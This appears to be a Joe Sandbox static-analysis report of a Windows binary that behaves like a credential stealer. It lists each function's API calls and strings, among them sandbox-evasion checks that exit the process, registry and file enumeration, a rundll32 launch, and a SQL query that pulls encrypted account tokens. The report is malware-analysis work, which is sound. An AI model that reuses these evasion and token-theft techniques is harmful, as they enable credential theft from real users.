Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B44D

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
lstrlen.KERNEL32(00000000), ref: 0040B553
lstrlen.KERNEL32(00000000), ref: 0040B567

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 0040B3BB
AccountTokens, xrefs: 0040B319
AccountId, xrefs: 0040B472
AccountTokens, xrefs: 0040B28A

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: d6f8aa2c73c68f92a0e58bbbfc20920170efd5a28ce5b04736f5b5a1e9792500
Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
Opcode Fuzzy Hash: d6f8aa2c73c68f92a0e58bbbfc20920170efd5a28ce5b04736f5b5a1e9792500
Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004136B0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04052928), ref: 00415F11
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04052958), ref: 00415F2A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,040528F8), ref: 00415F42
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04052970), ref: 00415F5A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04052988), ref: 00415F73
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,0406DC80), ref: 00415F8B
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04054058), ref: 00415FA3
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04053E98), ref: 00415FBC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04070438), ref: 00415FD4
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04070348), ref: 00415FEC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,040704C8), ref: 00416005
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04070228), ref: 0041601D
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04053EB8), ref: 00416035
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,040703D8), ref: 0041604E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1

Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E

Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103

Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254

Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434

GetUserDefaultLangID.KERNEL32 ref: 004136E6

Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04070898,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0406DD00,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,0406DD00,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1125299040-0
Opcode ID: 347c744c57bb489da1d20327baf5dbd504a16fe07c4081f8531455d2c5727875
Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
Opcode Fuzzy Hash: 347c744c57bb489da1d20327baf5dbd504a16fe07c4081f8531455d2c5727875
Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

RegQueryValueExA.KERNEL32(00000000,040767F8,00000000,000F003F,?,00000400), ref: 00414C89
lstrlen.KERNEL32(?), ref: 00414C9E
RegQueryValueExA.KERNEL32(00000000,040769D8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
RegCloseKey.KERNEL32(00000000), ref: 00414DA5
RegCloseKey.ADVAPI32(00000000), ref: 00414DB7

Strings

%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 8ab0f01d07d0afedc2f6091183216f607dc1c33232ff2026bfdf8348589bd1d2
Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
Opcode Fuzzy Hash: 8ab0f01d07d0afedc2f6091183216f607dc1c33232ff2026bfdf8348589bd1d2
Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411D80 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411DA5
RegOpenKeyExA.KERNEL32(80000001,04077810,00000000,00020119,?), ref: 00411DC4
RegQueryValueExA.ADVAPI32(?,04078430,00000000,00000000,00000000,000000FF), ref: 00411DE8
RegCloseKey.ADVAPI32(?), ref: 00411DF2
lstrcat.KERNEL32(?,00000000), ref: 00411E17
lstrcat.KERNEL32(?,04078268), ref: 00411E2B

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,040779F8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
lstrlen.KERNEL32(00000000), ref: 00409F6A

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
DeleteFileA.KERNEL32(00000000), ref: 00409FEB

Strings

X@, xrefs: 00409BC4, 00409BF0, 00409FCD, 00409BC7, 00409BF3, 00409FD0

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID: X@
API String ID: 3258613111-2850556465
Opcode ID: a8e0db1d6ef1a99a5c6703875a911b59b2c791a67ea3088ef4958de5150a2a16
Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
Opcode Fuzzy Hash: a8e0db1d6ef1a99a5c6703875a911b59b2c791a67ea3088ef4958de5150a2a16
Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 00410FA0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,040779F8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

ShellExecuteEx.SHELL32(0000003C), ref: 00411307

Strings

C:\Windows\system32\rundll32.dll, xrefs: 004110BF
.dll, xrefs: 00411054
<, xrefs: 004112AC
"" , xrefs: 004111DC

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
API String ID: 672783590-3078973353
Opcode ID: 8bf581271a99245cbe763f15856ee47378d6d56aa465237988ebd28fe15ceb26
Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
Opcode Fuzzy Hash: 8bf581271a99245cbe763f15856ee47378d6d56aa465237988ebd28fe15ceb26
Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004123F0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,04076B10), ref: 0041244B

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412471
lstrcat.KERNEL32(?,?), ref: 00412490
lstrcat.KERNEL32(?,?), ref: 004124A4
lstrcat.KERNEL32(?,0406FB08), ref: 004124B7
lstrcat.KERNEL32(?,?), ref: 004124CB
lstrcat.KERNEL32(?,04077350), ref: 004124DF

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 9316919b2ae84fd87c37e37ff305c137bc980bc565c5ec5aca0636d12a2c7ed7
Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
Opcode Fuzzy Hash: 9316919b2ae84fd87c37e37ff305c137bc980bc565c5ec5aca0636d12a2c7ed7
Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
__aulldiv.LIBCMT ref: 00401218
__aulldiv.LIBCMT ref: 00401226
ExitProcess.KERNEL32 ref: 00401254

Strings

@, xrefs: 004011F3

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D

Uniqueness

Uniqueness Score: -1.00%

Function 6BA6C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6BA6C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6BA6C969
GetSystemInfo.KERNEL32(?), ref: 6BA6C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6BA6C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6BA6C9E2

Memory Dump Source

Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true

Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 341fe4c0c2de812b14e32742004722da435217855940b3b3dac0fa7b61a88c72
Instruction ID: ce47970c0cc3163c536d3795196afd30da5ac0cb2faedac466f2c1604ba601bb
Opcode Fuzzy Hash: 341fe4c0c2de812b14e32742004722da435217855940b3b3dac0fa7b61a88c72
Instruction Fuzzy Hash: 382129726447146BDF059A38CC84BAE73B9FB86740F90411EF942A7680FB34DC8187A0

Uniqueness

Uniqueness Score: -1.00%

Function 00412980 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 004129BA
lstrcat.KERNEL32(?,0041D888), ref: 004129D7
lstrcat.KERNEL32(?,040707F8), ref: 004129EB
lstrcat.KERNEL32(?,0041D88C), ref: 004129FD

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

L0A, xrefs: 00412A22, 00412A51, 00412A73, 00412A25, 00412A54

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: L0A
API String ID: 2667927680-1482484291
Opcode ID: a9c67daaacc7e92ff4ee03e3180183e77f5cf7bec37821e85d74a49978411dd6
Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
Opcode Fuzzy Hash: a9c67daaacc7e92ff4ee03e3180183e77f5cf7bec37821e85d74a49978411dd6
Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
HeapAlloc.KERNEL32(00000000), ref: 0040127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
RegCloseKey.ADVAPI32(?), ref: 004012BF

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
HeapAlloc.KERNEL32(00000000), ref: 0041475B
RegOpenKeyExA.KERNEL32(80000002,04072828,00000000,00020119,00000000), ref: 0041477B
RegQueryValueExA.KERNEL32(00000000,04077410,00000000,00000000,000000FF,000000FF), ref: 0041479C
RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
HeapAlloc.KERNEL32(00000000), ref: 0041431B
RegOpenKeyExA.KERNEL32(80000002,040727F0,00000000,00020119,00000000), ref: 0041433B
RegQueryValueExA.KERNEL32(00000000,04076780,00000000,00000000,000000FF,000000FF), ref: 0041435C
RegCloseKey.ADVAPI32(00000000), ref: 00414366

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

